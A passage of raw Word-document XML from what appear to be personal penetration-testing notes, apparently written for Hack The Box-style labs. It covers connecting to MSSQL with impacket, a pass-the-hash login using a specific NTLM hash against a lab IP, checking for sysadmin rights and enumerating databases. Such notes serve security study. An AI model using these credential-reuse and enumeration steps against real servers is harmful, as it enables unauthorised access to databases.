      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab123 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--windows-auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag forces NTLM authentication (as opposed to Kerberos)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect using mssqlclient.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd impacket/examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mssqlclient.py [username]:[password]@[domain]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to connect using username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how they connected in the Escape HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mssqlclient.py [USERNAME]@{TARGET_IP} -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes it doesn't work without -windows-auth, so try with and without</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This flag is specified to use Windows Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001900">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass the hash with mssqlclient.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient celia.almeda@10.10.196.142 -hashes :e728ecbadfb02f51ce8eed753f3ff3fd -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001902">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I figured it out by looking at the help output in terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001903">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1320"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pretty standard for impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001904">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001905">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to specify port:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001906">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-port 1433</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001907">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001908">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001909">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image84.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image84.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51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190A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever get such an error, just remove the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-windows-auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7q3vcr20l58z" w:id="201"/>
      <w:bookmarkEnd w:id="201"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As a first step we need to check what is the role we have in the server. We will use the command found in the above </w:t>
      </w:r>
      <w:hyperlink r:id="rId512">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT is_srvrolemember('sysadmin');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it outputs "1", then it's true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001910">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are sysadmin, then you have permissions to do anything, including allowing command execution!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001911">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001912">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: When using an SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running the command remotely, we can omit the GO statement since it's not part of the MSSQL TDS protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001913">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001914">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001915">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Commands for Orientation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001916">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001917">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start by gathering information about the SQL Server and its environment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001918">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001919">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check SQL Server Version AND underlying operating system version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT @@version;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4062413" cy="1204401"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87" name="image83.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image83.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId513"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4062413" cy="1204401"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our query returned valuable information about the running version of the MSSQL server along with the Windows Server version, including its build number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001920">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name FROM sys.databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001921">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001922">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
